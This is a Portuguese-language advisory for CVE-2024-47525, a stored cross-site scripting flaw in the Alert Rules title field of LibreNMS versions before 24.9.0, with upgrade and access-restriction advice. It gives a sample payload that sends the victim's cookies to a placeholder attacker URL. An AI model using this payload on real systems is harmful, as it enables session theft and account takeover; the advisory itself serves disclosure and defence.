CVE-2024-47525

Versões do LibreNMS anteriores à 24.9.0

Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) no recurso “Regras de Alerta” permite que usuários autenticados injetem JavaScript arbitrário através do campo ‘Título’. Isso pode levar à execução de código malicioso no contexto das sessões de outros usuários, comprometendo potencialmente suas contas e permitindo ações não autorizadas. A vulnerabilidade ocorre ao criar uma regra de alerta, pois o aplicativo não sanitiza adequadamente as entradas do usuário no campo “Título”. Por exemplo, uma carga útil como test1'‘ autofocus onfocus="document.location='https://<attacker-url>/logger.php?c=’+document.cookie" pode ser usada para acionar o XSS quando a página afetada é carregada, redirecionando automaticamente o usuário para o domínio controlado pelo invasor com quaisquer cookies não-httponly presentes.

Para versões anteriores à 24.9.0, atualize para a versão 24.9.0 ou posterior para permanecer protegido. Como solução temporária, considere restringir o acesso ao recurso “Regras de Alerta” até que o problema seja resolvido. Evite usar o campo name no recurso “Regras de Alerta” para injetar código JavaScript malicioso. Restrinja o uso do campo title para minimizar o risco de exploração.